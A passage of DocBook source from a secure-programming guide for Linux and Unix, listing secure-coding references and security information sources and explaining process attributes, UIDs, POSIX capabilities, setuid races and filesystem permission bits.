Some recommendations must be taken with caution, for example,
the BSD setuid(7) man page
<ulink
url="http://www.homeport.org/~adam/setuid.7.html">[Unknown]</ulink>
recommends the use of access(3) without noting the dangerous race conditions
that usually accompany it.
Wood [1985] has some useful but dated advice
in its ``Security for Programmers'' chapter.
<ulink
url="http://www.research.att.com/~smb/talks">Bellovin [1994]</ulink>
includes useful guidelines and some specific examples, such as how to
restructure an ftpd implementation to be simpler and more secure.
FreeBSD provides some guidelines
<ulink
url="http://www.freebsd.org/security/security.html">FreeBSD [1999]</ulink>
<ulink url="http://developer.gnome.org/doc/guides/programming-guidelines/book1.html">[Quintero 1999]</ulink>
is primarily concerned with GNOME programming guidelines, but it
includes a section on security considerations.
<ulink url="http://www.fish.com/security/murphy.html">[Venema 1996]</ulink>
provides a detailed discussion (with examples) of some common errors
when programming secure programs (widely-known or predictable passwords,
burning yourself with malicious data, secrets in user-accessible data,
and depending on other programs).
<ulink url="http://www.fish.com/security/maldata.html">[Sibert 1996]</ulink>
describes threats arising from malicious data.
Michael Bacarella's article
<ulink url="http://m.bacarella.com/papers/secsoft/html">
The Peon's Guide To Secure System Development</ulink>
provides a nice short set of guidelines.
</para>

<para>
There are many documents giving security guidelines for
programs using
the Common Gateway Interface (CGI) to interface with the web.
These include
<!-- ???: Re-examine this one: anything new here? -->
<ulink url="http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec">Van Biesbrouck [1996]</ulink>,
<ulink
url="http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html">Gundavaram [unknown]</ulink>,
<ulink url="http://webreview.com/wr/pub/97/08/08/bookshelf">
[Garfinkle 1997]</ulink>
<ulink
url="http://www.eekim.com/pubs/cgibook">Kim [1996]</ulink>,
<ulink
url="http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt">Phillips [1995]</ulink>,
<ulink
url="http://www.w3.org/Security/Faq/www-security-faq.html">Stein [1999]</ulink>,
<ulink url="http://members.home.net/razvan.peteanu">[Peteanu 2000]</ulink>,
and
<ulink
url="http://advosys.ca/tips/web-security.html">[Advosys 2000]</ulink>.
</para>

<para>
There are many documents specific to a language, which are further
discussed in the language-specific sections of this book.
For example, the Perl distribution includes
<ulink url="http://www.perl.com/pub/doc/manual/html/pod/perlsec.html">
perlsec(1)</ulink>, which describes how to use Perl more securely.
The Secure Internet Programming site at
<ulink url="http://www.cs.princeton.edu/sip">http://www.cs.princeton.edu/sip</ulink>
is interested in computer security issues in general, but focuses on
mobile code systems such as Java, ActiveX, and JavaScript; Ed Felten
(one of its principles) co-wrote a book on securing Java
(<ulink url="http://www.securingjava.com">[McGraw 1999]</ulink>)
which is discussed in <xref linkend="java">.
Sun's security code guidelines provide some guidelines primarily
for Java and C; it is available at
<ulink url="http://java.sun.com/security/seccodeguide.html">
http://java.sun.com/security/seccodeguide.html</ulink>.
</para>

<para>
Yoder [1998] contains a collection of patterns to be used
when dealing with application security.
It's not really a specific set of guidelines, but a set of commonly-used
patterns for programming that you may find useful.
The Schmoo group maintains a web page linking to information on
how to write secure code at
<ulink url="http://www.shmoo.com/securecode">http://www.shmoo.com/securecode</ulink>.
</para>

<para>
There are many documents describing the issue from
the other direction (i.e., ``how to crack a system'').
One example is McClure [1999], and there's countless amounts of material
from that vantage point on the Internet.
There are also more general documents on computer architectures on how
attacks must be developed to exploit them, e.g.,
[LSD 2001].
The Honeynet Project has been collecting information
(including statistics) on how attackers
actually perform their attacks; see their website at
<ulink url="http://project.honeynet.org">http://project.honeynet.org</ulink>
for more information.
</para>

<para>
There's also a large body of information on vulnerabilities
already identified in existing programs.
This can be a useful set of
examples of ``what not to do,'' though it takes effort to extract more
general guidelines from the large body of specific examples.
There are mailing lists that discuss security issues; one of the most
well-known is
<ulink url="http://SecurityFocus.com/forums/bugtraq/faq.html">
Bugtraq</ulink>, which among other things develops a list of vulnerabilities.
The CERT Coordination Center (CERT/CC)
is a major reporting center for Internet security problems which
reports on vulnerabilities.
The CERT/CC occasionally produces advisories that
provide a description of a serious security problem
and its impact, along with
instructions on how to obtain a patch or details of a workaround; for
more information see
<ulink url="http://www.cert.org">http://www.cert.org</ulink>.
Note that originally the CERT was
a small computer emergency response team, but officially
``CERT'' doesn't stand for anything now.
The Department of Energy's
<ulink url="http://ciac.llnl.gov/ciac">Computer
Incident Advisory Capability (CIAC)</ulink> also reports on vulnerabilities.
<!-- Could reference ntbugtraq and the ones listed in
    http://www.cert.org/other_sources/other_teams.html and the
    various backers of CVE -->
These different groups may identify the same vulnerabilities but use different
names.
To resolve this problem,
MITRE supports the Common Vulnerabilities and Exposures (CVE) list
which creates a single unique identifier (``name'')
for all publicly known vulnerabilities and security exposures
identified by others; see
<ulink url="http://www.cve.mitre.org">http://www.cve.mitre.org</ulink>.
NIST's ICAT
is a searchable catalog of computer vulnerabilities, categorizing
each CVE vulnerability so that they can be searched
and compared later; see
<ulink url="http://csrc.nist.gov/icat">http://csrc.nist.gov/icat</ulink>.
</para>

<para>
This book is a summary of what I believe are the most
useful and important guidelines.
My goal is a book that
a good programmer can just read and then be fairly well prepared
to implement a secure program.
No single document can really meet this goal, but
I believe the attempt is worthwhile.
My objective is to strike a balance somewhere between a
``complete list of all possible guidelines''
(that would be unending and unreadable)
and the various ``short'' lists available on-line that are nice and short
but omit a large number of critical issues.
When in doubt, I include the guidance; I believe in that case it's better
to make the information
available to everyone in this ``one stop shop'' document.
The organization presented here is my own (every list has its own, different
structure), and some of the guidelines (especially the Linux-unique
ones, such as those on capabilities and the FSUID value) are also my own.
Reading all of the referenced documents listed above as well
is highly recommended, though I realize that for many it's impractical.
</para>
</sect1>

<sect1 id="other-sources">
<title>Other Sources of Security Information</title>

<para>
There are a vast number of web sites and mailing lists dedicated to
security issues.
Here are some other sources of security information:
<itemizedlist>
<listitem><para>
<ulink url="http://www.securityfocus.com">Securityfocus.com</ulink>
has a wealth of general security-related news and information, and hosts
a number of security-related mailing lists.
See their website for information on how to subscribe and view their archives.
A few of the most relevant mailing lists on SecurityFocus are:
<itemizedlist>
<listitem><para>
The ``Bugtraq'' mailing list is, as noted above,
a ``full disclosure moderated mailing list for the detailed discussion and
announcement of computer security vulnerabilities:
what they are, how to exploit them, and how to fix them.''
</para></listitem>
<listitem><para>
The ``secprog'' mailing list is
a moderated mailing list for the discussion of secure software
development methodologies and techniques.
I specifically monitor this list, and I coordinate with its moderator
to ensure that resolutions reached in SECPROG (if I agree with them)
are incorporated into this document.
</para></listitem>
<listitem><para>
The ``vuln-dev'' mailing list discusses potential or undeveloped holes.
</para></listitem>
</itemizedlist>
</para></listitem>
<listitem><para>
IBM's ``developerWorks: Security'' has a library of interesting articles.
You can learn more from
<ulink url="http://www.ibm.com/developer/security">http://www.ibm.com/developer/security</ulink>.
</para></listitem>
<listitem><para>
For Linux-specific security information, a good source is
<ulink url="http://www.linuxsecurity.com">LinuxSecurity.com</ulink>.
If you're interested in auditing Linux code, places to see include
the <ulink url="http://www.linuxhelp.org/lsap.shtml">Linux
Security-Audit Project FAQ</ulink>
and <ulink url="http://www.lkap.org">Linux Kernel Auditing Project</ulink>
are dedicated to auditing Linux code for security issues.
</para></listitem>
</itemizedlist>
Of course, if you're securing specific systems, you should sign up to
their security mailing lists (e.g., Microsoft's, Red Hat's, etc.)
so you can be warned of any security updates.
</para>


</sect1>

<sect1 id="conventions">
<title>Document Conventions</title>

<para>
System manual pages are referenced in the format <emphasis remap="it">name(number)</emphasis>,
where <emphasis remap="it">number</emphasis> is the section number of the manual.
The pointer value that means ``does not point anywhere'' is called NULL;
C compilers will convert the integer 0 to the value NULL in most circumstances
where a pointer is needed,
but note that nothing in the C standard requires that NULL actually
be implemented by a series of all-zero bits.
C and C++ treat the character '\0' (ASCII 0) specially, and this value
is referred to as NIL in this book (this is usually called ``NUL'',
but ``NUL'' and ``NULL'' sound identical).
Function and method names always use the correct case, even if that means
that some sentences must begin with a lower case letter.
I use the term ``Unix-like'' to mean Unix, Linux, or other systems whose
underlying models are very similar to Unix;
I can't say POSIX, because there are systems such as Windows 2000 that
implement portions of POSIX yet have vastly different security models.
</para>

<para>
An attacker is called an ``attacker'', ``cracker'', or ``adversary'',
and not a ``hacker''.
Some journalists mistakenly use the word ``hacker'' instead of ``attacker'';
this book avoids this misuse, because many
Linux and Unix developers refer to themselves as ``hackers''
in the traditional non-evil sense of the term.
To many Linux and Unix developers, the term ``hacker'' continues
to mean simply an expert or enthusiast, particularly regarding computers.
It is true that some hackers commit malicious or intrusive actions,
but many other hackers do not,
and it's unfair to claim that all hackers perform malicious activities.
Many other glossaries and books note that not all hackers are attackers.
For example,
the Industry Advisory Council's Information Assurance (IA)
Special Interest Group (SIG)'s
<ulink url="http://www.iaconline.org/sig_infoassure.html">
Information Assurance Glossary</ulink> defines hacker as
``A person who delights in having an intimate understanding of the
internal workings of computers and computer networks.
The term is misused in a negative context where `cracker' should be used.''
<ulink url="http://www.catb.org/~esr/jargon">The
Jargon File</ulink> has a
<ulink url="http://www.catb.org/~esr/jargon/html/entry/hacker.html">
long and complicate definition for hacker</ulink>, starting with
``A person who enjoys exploring the details of programmable systems
and how to stretch their capabilities,
as opposed to most users, who prefer to learn only the minimum necessary.'';
it notes although some people use the term to mean
``A malicious meddler who tries to discover sensitive information
by poking around'', it also states that this definition is deprecated and
that the correct term for this sense is ``cracker''.
</para>

<!-- TRANSLATORS:  FEEL FREE TO OMIT THE FOLLOWING PARAGRAPH
     (OR PORTIONS OF IT) IF IT DOES NOT APPLY TO YOUR LANGUAGE.  -->
<para>
This book uses the ``new'' or ``logical'' quoting system, instead
of the traditional American quoting system: quoted information
does not include any trailing punctuation if the punctuation
is not part of the material being quoted.
While this may cause a minor loss of typographical beauty, the traditional
American system causes extraneous characters to be placed inside the quotes.
These extraneous characters have
no effect on prose but can be disastrous in code or computer commands.
<!-- See http://www.catb.org/~esr/jargon/html/Hacker-Writing-Style.html -->
<!-- I distinguish between the terms privilege and permission in this book;
a process (subject) may acquire privileges, while an object has permissions. -->
I use standard American (not British) spelling; I've yet to meet an
English speaker on any continent who has trouble with this.
</para>

</sect1>

</chapter>

<chapter id="features">
<title>Summary of Linux and Unix Security Features</title>

<epigraph>
<attribution>Proverbs 2:11 (NIV)</attribution>
<para>
Discretion will protect you, and understanding will guard you.
</para>
</epigraph>

<para>
Before discussing guidelines on how to use Linux or Unix security features,
it's useful to know what those features are from a programmer's viewpoint.
This section briefly describes those features that are widely available
on nearly all Unix-like systems.
However, note that there is considerable variation between
different versions of Unix-like systems, and
not all systems have the abilities described here.
This chapter also notes some extensions or features specific to Linux;
Linux distributions tend to be fairly similar to each other from the
point-of-view of programming for security, because they all use essentially
the same kernel and C library (and the GPL-based licenses encourage rapid
dissemination of any innovations).
It also notes some of the security-relevant differences between different
Unix implementations, but please note that this isn't an exhaustive list.
This chapter doesn't discuss issues such as implementations of
mandatory access control (MAC) which many Unix-like systems do not implement.
If you already know what
those features are, please feel free to skip this section.
</para>

<para>
Many programming guides skim briefly over the security-relevant portions
of Linux or Unix and skip important information.
In particular, they often discuss ``how to use'' something in general terms
but gloss over the security attributes that affect their use.
Conversely, there's a great deal of detailed information in
the manual pages about individual functions, but the manual pages
sometimes obscure key security issues with detailed discussions on how
to use each individual function.
This section tries to bridge that gap; it gives an overview of
the security mechanisms in Linux that are likely to be used
by a programmer, but concentrating specifically on the security
ramifications.
This section has more depth than the typical programming guides, focusing
specifically on security-related matters, and points to references
where you can get more details.
</para>

<para>
First, the basics.
Linux and Unix are
fundamentally divided into two parts: the kernel and ``user space''.
Most programs execute in user space (on top of the kernel).
Linux supports the concept of ``kernel modules'', which is simply the
ability to dynamically load code into the kernel, but note that it
still has this fundamental division.
Some other systems (such as the HURD) are ``microkernel'' based systems; they
have a small kernel with more limited functionality, and a set of ``user''
programs that implement the lower-level functions traditionally implemented
by the kernel.
</para>

<para>
Some Unix-like systems have been extensively modified to support
strong security, in particular to support U.S. Department of Defense
requirements for Mandatory Access Control (level B1 or higher).
This version of this book doesn't cover these systems or issues;
I hope to expand to that in a future version.
More detailed information on some of them is available elsewhere, for
example, details on SGI's ``Trusted IRIX/B''
are available in NSA's
<ulink url="http://www.radium.ncsc.mil/tpep/library/fers/index.html">Final
Evaluation Reports (FERs)</ulink>.
<!-- ???: Mention trusted Unix-like systems, MAC, ACLs, Trusted Solaris -->
</para>

<para>
When users log in, their usernames are mapped to integers marking their
``UID'' (for ``user id'') and the ``GID''s (for ``group id'') that they
are a member of.
UID 0 is a special privileged user (role) traditionally called ``root'';
on most Unix-like systems (including Unix) root
can overrule most security checks and is used to administrate the system.
On some Unix systems, GID 0 is also special and permits unrestricted access
to resources at the group level [Gay 2000, 228];
this isn't true on other systems (such as Linux), but even in those systems
group 0 is essentially all-powerful because so many special system files
are owned by group 0.
Processes are the only ``subjects'' in terms of security (that is, only
processes are active objects).
Processes can access various data objects, in particular filesystem
objects (FSOs), System V Interprocess Communication (IPC) objects, and
network ports.
Processes can also set signals.
Other security-relevant topics include quotas and limits, libraries,
auditing, and PAM.
The next few subsections detail this.
</para>

<sect1 id="processes">
<title>Processes</title>

<para>
In Unix-like systems,
user-level activities are implemented by running processes.
Most Unix systems support a ``thread'' as a separate concept;
threads share memory inside a process, and the system scheduler actually
schedules threads.
Linux does this differently (and in my opinion uses a better approach):
there is no essential difference between a thread and a process.
Instead, in Linux, when a process creates another process it can choose
what resources are shared (e.g., memory can be shared).
The Linux kernel then performs optimizations to get thread-level speeds;
see clone(2) for more information.
It's worth noting that the Linux kernel developers tend to use the
word ``task'', not ``thread'' or ``process'', but the external
documentation tends to use the word process
(so I'll use the term ``process'' here).
When programming a multi-threaded application,
it's usually better to use one of the standard
thread libraries that hide these differences.
Not only does this make threading more portable, but some libraries
provide an additional level of indirection, by implementing more than
one application-level thread as a single operating system thread;
this can provide some improved performance on some systems for
some applications.
</para>

<sect2 id="process-attributes">
<title>Process Attributes</title>

<para>
Here are typical attributes associated with each process in a
Unix-like system:

<itemizedlist>
<listitem>

<para>
RUID, RGID - real UID and GID
of the user on whose behalf the process is running
</para>
</listitem>
<listitem>

<para>
EUID, EGID - effective UID and GID
used for privilege checks (except for the filesystem)
</para>
</listitem>
<listitem>

<para>
SUID, SGID - Saved UID and GID;
used to support switching permissions ``on and off'' as discussed below.
Not all Unix-like systems support this, but the vast majority do
(including Linux and Solaris);
if you want to check if a given system implements this option in the
POSIX standard, you can use sysconf(2) to determine if
_POSIX_SAVED_IDS is in effect.
</para>
</listitem>
<listitem>

<para>
supplemental groups - a list of groups (GIDs) in which this
user has membership.
In the original version 7 Unix, this didn't exist -
processes were only a member of one group at a time, and a special
command had to be executed to change that group.
BSD added support for a list of groups in each process,
which is more flexible, and
this addition is now widely implemented (including by Linux and Solaris).
</para>
</listitem>
<listitem>

<para>
umask - a set of bits determining the default access control settings
when a new filesystem object is created; see umask(2).
</para>
</listitem>
<listitem>

<para>
scheduling parameters - each process has a scheduling policy, and those
with the default policy SCHED&lowbar;OTHER have the additional parameters
nice, priority, and counter.  See sched&lowbar;setscheduler(2) for more information.
</para>
</listitem>
<listitem>

<para>
limits - per-process resource limits (see below).
</para>
</listitem>
<listitem>

<para>
filesystem root - the process' idea of where the root filesystem
("/") begins; see chroot(2).
</para>
</listitem>

</itemizedlist>

</para>

<para>
Here are less-common attributes associated with processes:

<itemizedlist>
<listitem>

<para>
FSUID, FSGID - UID and GID used for filesystem access checks;
this is usually equal to the EUID and EGID respectively.
This is a Linux-unique attribute.
</para>
</listitem>
<listitem>

<para>
capabilities - POSIX capability information; there are actually three
sets of capabilities on a process: the effective, inheritable, and permitted
capabilities.  See below for more information on POSIX capabilities.
Linux kernel version 2.2 and greater support this; some other Unix-like
systems do too, but it's not as widespread.
</para>
</listitem>

</itemizedlist>

</para>

<para>
In Linux,
if you really need to know exactly what attributes are associated
with each process, the most definitive source is the
Linux source code, in particular
<filename>/usr/include/linux/sched.h</filename>'s definition of task&lowbar;struct.
</para>

<para>
The portable way to create new processes it use the fork(2) call.
BSD introduced a variant called vfork(2) as an optimization technique.
The bottom line with vfork(2) is simple: <emphasis remap="it">don't</emphasis> use it if you
can avoid it.
See <xref linkend="avoid-vfork"> for more information.
</para>

<para>
Linux supports the Linux-unique clone(2) call.
This call works like fork(2), but allows specification of which resources
should be shared (e.g., memory, file descriptors, etc.).
Various BSD systems implement an rfork() system call
(originally developed in Plan9); it has different
semantics but the same general idea (it also creates a process with tighter
control over what is shared).
<!-- For more on a vulnerability in old versions of rfork
 (setuid/setgid programs could be controlled), see
 http://www.openbsd.org/advisories/rfork.txt -->
Portable programs shouldn't use these calls directly, if possible;
as noted earlier,
they should instead rely on threading libraries that use such
calls to implement threads.
</para>

<para>
This book is not a full tutorial on writing programs, so
I will skip widely-available information handling processes.
You can see the documentation for wait(2), exit(2), and so on for more
information.
</para>

</sect2>

<sect2 id="posix-capabilities">
<title>POSIX Capabilities</title>

<para>
POSIX capabilities are sets of bits that permit splitting of the privileges
typically held by root into a larger set of more specific privileges.
POSIX capabilities are defined
by a draft IEEE standard; they're not unique to Linux but they're not
universally supported by other Unix-like systems either.
Linux kernel 2.0 did not support POSIX capabilities, while version 2.2
added support for POSIX capabilities to processes.
When Linux documentation (including this one)
says ``requires root privilege'', in nearly all cases it
really means ``requires a capability'' as documented in the capability
documentation.
If you need to know the specific capability required, look it up in the
capability documentation.
</para>

<para>
In Linux,
the eventual intent is to permit capabilities to be attached to files
in the filesystem; as of this writing, however, this is not yet supported.
There is support for transferring capabilities, but this is disabled
by default.
Linux version 2.2.11 added a feature that makes capabilities
more directly useful, called the ``capability bounding set''.
The capability bounding set is a list of capabilities
that are allowed to be held by any process on the system (otherwise,
only the special init process can hold it).
If a capability does not appear in the bounding set, it may not be
exercised by any process, no matter how privileged.
This feature can be used to, for example, disable kernel module loading.
A sample tool that takes advantage of this is LCAP at
<ulink
url="http://pweb.netcom.com/~spoon/lcap/">http://pweb.netcom.com/~spoon/lcap/</ulink>.
</para>

<para>
More information about POSIX capabilities is available at
<ulink
url="ftp://linux.kernel.org/pub/linux/libs/security/linux-privs">ftp://linux.kernel.org/pub/linux/libs/security/linux-privs</ulink>.
</para>

</sect2>

<sect2 id="process-creation">
<title>Process Creation and Manipulation</title>

<para>
Processes may be created using fork(2), the non-recommended vfork(2),
or the Linux-unique clone(2); all of these system calls duplicate the existing
process, creating two processes out of it.
A process can execute a different program by calling execve(2),
or various front-ends to it (for example, see exec(3), system(3), and popen(3)).
</para>

<para>
<!-- I've known about the scripting race condition since forever, but the
     description here is vaguely derived from perlsec(1) -->
When a program is executed, and its file has its setuid or setgid bit set,
the process' EUID or EGID (respectively) is usually set to the file's value.
This functionality was the source of an old Unix security weakness
when used to support setuid or setgid scripts, due to a race condition.
Between the time the kernel opens the file to see which interpreter to run,
and when the (now-set-id) interpreter turns around and reopens
the file to interpret it, an attacker might change the file
(directly or via symbolic links).
</para>

<para>
Different Unix-like systems handle the security issue for setuid scripts
in different ways.
Some systems, such as Linux, completely ignore the setuid and setgid
bits when executing scripts, which is clearly a safe approach.
Most modern releases of SysVr4 and BSD 4.4 use a different approach to
avoid the kernel race condition.
On these systems, when the kernel passes
the name of the set-id script to open to the interpreter,
rather than using a pathname (which would permit the race condition)
it instead passes the filename /dev/fd/3.  This is a special
file already opened on the script, so that there can be no
race condition for attackers to exploit.
Even on these systems I recommend against using the setuid/setgid
shell scripts language for secure programs, as discussed below.
</para>


<para>
In some cases a process can affect the various UID and GID values; see
setuid(2), seteuid(2), setreuid(2), and the Linux-unique setfsuid(2).
In particular the saved user id (SUID) attribute
is there to permit trusted programs to temporarily switch UIDs.
Unix-like systems supporting the SUID use the following rules:
If the RUID is changed, or the EUID is set to a value not equal to the RUID,
the SUID is set to the new EUID.
Unprivileged users can set their EUID from their SUID,
the RUID to the EUID, and the EUID to the RUID.
<!-- ??? In FreeBSD, On execve(), the saved UID is reset to the EUID.
Source: "Advanced Unix Programming", Warren W. Gay, page 231. -->
</para>

<para>
The Linux-unique
FSUID process attribute is intended to permit programs like the NFS server
to limit themselves to only the filesystem rights of some given UID
without giving that UID permission to send signals to the process.
Whenever the EUID is changed, the FSUID is changed to the new
EUID value; the FSUID value can be set separately using setfsuid(2), a
Linux-unique call.
Note that non-root callers can only set FSUID to the current
RUID, EUID, SEUID, or current FSUID values.
</para>

</sect2>

</sect1>

<sect1 id="files">
<title>Files</title>

<para>
On all Unix-like systems, the primary repository of information is
the file tree, rooted at ``/''.
The file tree is a hierarchical set of directories, each of which
may contain filesystem objects (FSOs).
</para>

<para>
In Linux,
filesystem objects (FSOs) may be ordinary files, directories,
symbolic links, named pipes (also called first-in first-outs or FIFOs),
sockets (see below),
character special (device) files, or block special (device) files
(in Linux, this list is given in the find(1) command).
Other Unix-like systems have an identical or similar list of FSO types.
</para>

<para>
Filesystem objects are collected on filesystems, which can be
mounted and unmounted on directories in the file tree.
A filesystem type (e.g., ext2 and FAT) is a specific set of conventions
for arranging data on the disk to optimize speed, reliability, and so on;
many people use the term ``filesystem'' as a synonym for the filesystem type.
</para>

<sect2 id="fso-attributes">
<title>Filesystem Object Attributes</title>

<para>
Different Unix-like systems support different filesystem types.
Filesystems may have slightly different sets of access control attributes
and access controls can be affected by options selected at mount time.
On Linux, the ext2 filesystems is currently the most popular filesystem,
but Linux supports a vast number of filesystems.
Most Unix-like systems tend to support multiple filesystems too.
</para>

<para>
Most filesystems on Unix-like systems store at least the following:

<itemizedlist>
<listitem>

<para>
owning UID and GID - identifies the ``owner'' of the filesystem
object.  Only the owner or root can change the access control attributes
unless otherwise noted.
</para>
</listitem>
<listitem>

<para>
permission bits -
read, write, execute bits for each of user (owner), group, and other.
For ordinary files, read, write, and execute have their typical meanings.
In directories, the ``read'' permission is necessary to display a directory's
contents, while the ``execute'' permission is sometimes called ``search''
permission and is necessary to actually enter the directory to use its contents.
In a directory ``write'' permission on a directory permits
adding, removing, and renaming files in that directory; if you only want
to permit adding, set the sticky bit noted below.
Note that the permission values of symbolic links are never used; it's only
the values of their containing directories and the linked-to file that matter.
</para>
</listitem>
<listitem>

<para>
``sticky'' bit - when set on a directory, unlinks (removes) and
renames of files in that directory are limited to
the file owner, the directory owner, or root privileges.
This is a very common Unix extension
and is specified in the
Open Group's Single Unix Specification version 2.
<!-- http://www.opengroup.org/onlinepubs/007908799/xsh/chmod.html -->
Old versions of Unix called this the ``save program text'' bit and used this
to indicate executable files that should stay in memory.
Systems that did this ensured that only root could set this bit
(otherwise users could have crashed systems by forcing ``everything''
into memory).
In Linux, this bit has no effect on ordinary files and ordinary users
can modify this bit on the files they own:
Linux's virtual memory management makes this old use irrelevant.
</para>
</listitem>
<listitem>

<para>
setuid, setgid - when set on an executable file,
executing the file will set the process' effective UID or effective GID
to the value of the file's owning UID or GID (respectively).
All Unix-like systems support this.
In Linux and System V systems,
when setgid is set on a file that does not have any execute privileges,
this indicates a file that is subject to mandatory locking
during access (if the filesystem is mounted to support mandatory locking);
this overload of meaning surprises many and is not universal across Unix-like
systems.
In fact, the Open Group's Single Unix Specification version 2 for chmod(3)
permits systems to ignore
requests to turn on setgid for files that aren't executable if such
a setting has no meaning.
In Linux and Solaris,
when setgid is set on a directory, files created in the directory will
have their GID automatically reset to that of the directory's GID.
The purpose of this approach is to support ``project directories'':
users can save files into such specially-set directories and the group
owner automatically changes.
However, setting the setgid bit on directories is not specified by
standards such as the Single Unix Specification
[Open Group 1997].
</para>
</listitem>
<listitem>

<para>
timestamps - access and modification times are stored for each
filesystem object.  However, the owner is allowed to set these values
arbitrarily (see touch(1)), so be careful about trusting this information.
All Unix-like systems support this.
</para>
</listitem>

</itemizedlist>

</para>

<para>
The following attributes are Linux-unique extensions on the ext2
filesystem, though many other filesystems have similar functionality:

<itemizedlist>
<listitem>

<para>
immutable bit - no changes to the filesystem object are allowed;
only root can set or clear this bit.
This is only supported by ext2 and is not portable across all Unix
systems (or even all Linux filesystems).
</para>
</listitem>
<listitem>

<para>
append-only bit - only appending to the filesystem object are allowed;
only root can set or clear this bit.
This is only supported by ext2 and is not portable across all Unix
systems (or even all Linux filesystems).
</para>
</listitem>

</itemizedlist>

</para>

<para>
Other common extensions include some sort of bit indicating ``cannot
delete this file''.
</para>

<para>
Many of these values can be influenced at mount time, so that, for example,
certain bits can be treated as though they had a certain value (regardless
of their values on the media).
See mount(1) for more information about this.
These bits are useful, but be aware that some of these are intended to
simplify ease-of-use and aren't really sufficient to prevent certain actions.
For example, on Linux, mounting with ``noexec'' will disable execution of
programs on that file system; as noted in the manual, it's
intended for mounting filesystems containing binaries for incompatible systems.
On Linux,
this option won't completely prevent someone from running the files;
they can copy the files somewhere else to run them, or even use the
command ``/lib/ld-linux.so.2'' to run the file directly.
</para>

<para>
Some filesystems don't support some of these access control values; again,
see mount(1) for how these filesystems are handled.
In particular, many Unix-like systems support MS-DOS disks, which by
default support very few of these attributes (and there's not standard
way to define these attributes).
In that case, Unix-like systems emulate the standard attributes
(possibly implementing them through special on-disk files), and these
attributes are generally influenced by the mount(1) command.
</para>

<para>
It's important to note that, for adding and removing files, only the
permission bits and owner of the file's <emphasis>directory</emphasis>
really matter unless the Unix-like system supports
more complex schemes (such as POSIX ACLs).
Unless the system has other extensions, and stock Linux 2.2 doesn't,
a file that has no permissions in its permission bits
can still be removed if its containing directory permits it.
Also, if an ancestor directory permits its children to be changed by some
user or group, then any of that directory's descendants can be replaced by
that user or group.
</para>

<para>
The draft IEEE POSIX standard on security defines a technique for
true ACLs that support a list of users and groups with their permissions.
Unfortunately, this is not widely supported nor supported exactly the
same way across Unix-like systems.
Stock Linux 2.2, for example, has neither ACLs nor POSIX capability
values in the filesystem.
</para>

<para>
It's worth noting that in Linux, the Linux ext2
filesystem by default reserves a small amount of space for the root user.
This is a partial defense against denial-of-service attacks; even if a user
fills a disk that is shared with the root user, the root user has a little
space left over (e.g., for critical functions).
The default is 5&percnt; of the filesystem space; see mke2fs(8),
in particular its ``-m'' option.
</para>

</sect2>

<sect2 id="fso-initial-values">
<title>Creation Time Initial Values</title>

<para>
At creation time, the following rules apply.
On most Unix systems, when a new filesystem object is created via creat(2)
or open(2), the FSO UID is set to the process' EUID and the FSO's GID is
set to the process' EGID.
Linux works slightly differently due to its FSUID
extensions; the FSO's UID is set to the process' FSUID, and the FSO GID
is set to the process' FSGUID; if the
containing directory's setgid bit is set or the filesystem's
``GRPID'' flag is set, the FSO GID is actually set to the
GID of the containing directory.
Many systems, including Sun Solaris and Linux, also support the
setgid directory extensions.
As noted earlier,
this special case supports ``project'' directories: to make a ``project''
directory, create a special group for the project,
create a directory for the project owned by that group, then make the
directory setgid: files placed there
are automatically owned by the project.
Similarly, if a new subdirectory is created inside a directory with the
setgid bit set (and the filesystem GRPID isn't set), the new subdirectory
will also have its setgid bit set (so that project subdirectories will
``do the right thing''.); in all other cases the setgid is clear for a new file.
This is the rationale for the ``user-private group'' scheme
(used by Red Hat Linux and some others).
In this scheme,
every user is a member of a ``private'' group with just themselves as members,
so their defaults can permit the group to read and write any file
(since they're the only member of the group).
Thus, when the file's group membership
is transferred this way, read and write privileges
are transferred too.
<!-- http://www.redhat.com/support/manuals/RHL-6.2-Manual/ref-guide/s1-sysadmin-usr-grps.html -->
FSO basic access control values (read, write, execute) are computed from
(requested values &amp; ~ umask of process).
New files always start with a clear sticky bit and clear setuid bit.
</para>

</sect2>

<sect2 id="changing-acls">
<title>Changing Access Control Attributes</title>

<para>
You can set most of these values with chmod(2), fchmod(2), or chmod(1)
but see also chown(1), and chgrp(1).
In Linux, some of the Linux-unique attributes are manipulated using chattr(1).
</para>

<para>
Note that in Linux, only root can change the owner of a given file.
Some Unix-like systems allow ordinary users to transfer ownership of their
files to another, but this causes complications and is forbidden by Linux.
For example, if you're trying to limit disk usage,
allowing such operations would allow users to claim that large files
actually belonged to some other ``victim''.
</para>

</sect2>

<sect2 id="using-acls">
<title>Using Access Control Attributes</title>

<para>
Under Linux and most Unix-like systems, reading and writing
attribute values are only checked when the file is opened; they
are not re-checked on every read or write.
Still, a large number of calls do check these attributes,
since the filesystem is so central to Unix-like systems.
Calls that check these attributes
include open(2), creat(2), link(2), unlink(2), rename(2),
mknod(2), symlink(2), and socket(2).
</para>

</sect2>

<sect2 id="filesystem-hierarchy">
<title>Filesystem Hierarchy</title>

<para>
Over the years conventions have been built on ``what files to place where''.
Where possible,
please follow conventional use when placing information in the hierarchy.
For example, place global configuration information in /etc.
The Filesystem Hierarchy Standard (FHS) tries to
define these conventions in a logical manner, and is widely used by
Linux systems.
The FHS is an update to the previous
Linux Filesystem Structure standard (FSSTND), incorporating lessons
learned and approaches from Linux, BSD, and System V systems.
See <ulink
url="http://www.pathname.com/fhs">http://www.pathname.com/fhs</ulink> for more information about the FHS.
A summary of these conventions is in hier(5) for Linux
and hier(7) for Solaris.
Sometimes different conventions disagree; where possible, make these
situations configurable at compile or installation time.
</para>

<para>
I should note that the FHS has been adopted by the
<ulink url="http://www.linuxbase.org">Linux Standard Base</ulink> which
is developing and promoting a set of standards to increase
compatibility among Linux distributions and to enable
software applications to run on any compliant Linux system.
</para>

</sect2>

</sect1>

<sect1 id="sysv-ipc">
<title>System V IPC</title>

<para>
Many Unix-like systems, including
Linux and System V systems, support System V interprocess communication
(IPC) objects.
Indeed System V IPC is required by the
Open Group's Single UNIX Specification, Version 2
[Open Group 1997].
<!-- ???: how about BSD variants? -->
<!-- ???: is this the same as "POSIX shm"? John Levon asked; I think
  they're the same but I'm not certain. -->
System V IPC objects can be one of three kinds:
System V message queues, semaphore sets, and shared memory segments.
Each such object has the following attributes:

<itemizedlist>
<listitem>

<para>
read and write permissions for each of creator, creator group, and
others.
</para>
</listitem>
<listitem>

<para>
